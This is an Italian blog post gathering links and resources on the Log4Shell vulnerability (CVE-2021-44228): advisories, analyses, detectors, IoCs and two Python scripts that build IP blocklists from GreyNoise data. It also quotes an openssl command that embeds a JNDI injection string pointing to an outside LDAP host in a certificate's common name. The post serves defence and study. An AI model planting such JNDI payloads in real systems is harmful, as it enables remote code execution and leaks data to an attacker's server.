CVE-2021-44228 “Log4J”: una raccolta di link utili…

TL;DR Invece della solita disamina sulla vulnerabilità Log4Shell, ho preferito raccogliere i vari siti e post interessanti sul tema

CVE-2021-44228 – La scheda del CVE-2021-44228 su MITRE

CVE-2021-44228 Apache Log4j Remote Code Execution POC – Probabilmente il primo POC sulla vulnerabilità Log4j

Greynoise CVE-2021-44228 – Tracking aggiornato in tempo reale degli IP che effettuato scansioni per la vulnerabilità Apache Log4J

Script in Python che restituisce un file contenente gli IP che effettuano scansioni Apache Log4j, attraverso un query sulle API di Greynoise.io (richiesta chiave API):

#!/usr/bin/env python3
import requests
import json
 
url = "https://api.greynoise.io/v2/experimental/gnql?query=tags%3A%20Apache%20Log4j%20RCE%20Attempt%20classification%3A%20malicious&size=9001"
 
headers = {
    "Accept": "application/json",
    "key": " < GREYNOISE IP KEY > "
}
 
response = requests.request("GET", url, headers=headers)
response_json = json.loads(response.content)
 
data = response_json["data"]
 
with open('apache_log4j_rce_blocklist.txt', 'w') as f:
    for d in data:
        f.write(d['ip'] + "\n")

Log4Shell – LobSec – Una interessante analisi del CVE-2021-44228 in italiano

CVE-2021-44228 Apache Log4j RCE Attempts – Elenco degli IP raccolti in modo indipendente relativamente ai tentativi di attacco

Script Python che genera un file, un IP per linea, inseriti in questo elenco:

#!/usr/bin/env python3
import requests
import csv
url = 'https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw'
response = requests.get(url)
results = []
reader = csv.DictReader(response.text.splitlines())
for row in reader:
    results.append(row)
with open('apache_log4j_rce_blocklist.txt', 'w') as f:
    for d in results:
        f.write(d['ip'] + "\n")

Cybereason – Logout4Shell – Sfrutta la vulnerabilità Log4Shell per “vaccinare” il server vittima

jndi-response – Una interessante risposta “cattiva” contro gli attacchi JNDI, scaricando sull’attaccante un attacco zip-bomb

CERT-AgID condivide gli IoC per la mitigazione degli attacchi Log4shell – IoC dell’attacco Log4Shell condivisi dal CERT-AgID

What Do You Need to Know About the Log4j Critical Vulnerability and What Can You Do? – Una disamina dell’attacco da parte di SOCRadar.

BlueTeam Cheatsheet Log4Shell – Raccolta dei vari advisories relativi ai prodotti e software vulnerabili dall’attacco Log4Shell

Zero-Day Exploit Targeting Popular Java Library Log4j – Articolo del CERT Svizzero sull’attacco Log4Shell

Segnalati anche tentativi di attacco attraverso l’uso di beacon WiFi, usando come payload l’ESSID:

Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns – Report e analisi da parte di Juniper Networks

Log4Shell Hell: anatomy of an exploit outbreak – L’analisi di Sophos sull’attacco Log4Shell

…e, sempre da Sophos, una spiegazione tecnica più dettagliata: Log4Shell explained – how it works, why you need to know, and how to fix it

Log4j overview related software – Altro elenco di prodotti vulnerabili all’attacco, con le note di versione e lo stato della fix/mitigation

Log4Shell Scanner, Burp Extender plugin – Plugin per Burp Suite che si registra come controllo attivo dello scanner e genera due tipi di payload, per la verifica della vulnerabilità Log4J.

log4shell-detector – Detector for Log4Shell exploitation attempts, it checks local log files for indicators of exploitation attempts, even heavily obfuscated ones that string or regular expression based patterns wouldn’t detect.

Da @hackerfantastic su Twitter, come generare un certificato SSL contenente l’ormai famosa stringa:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -subj "/CN=\$\{jndi:ldap:\/\/x.x.x.x:389\/\$\{java:version\}\}"

Foto di copertina: la banda di percussioni “Bandao” durante una esibizione alla Fortezza Medicea di Siena

Questo articolo è stato visto 125 volte (Oggi 1 visite)

Hai imparato qualcosa di nuovo?

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.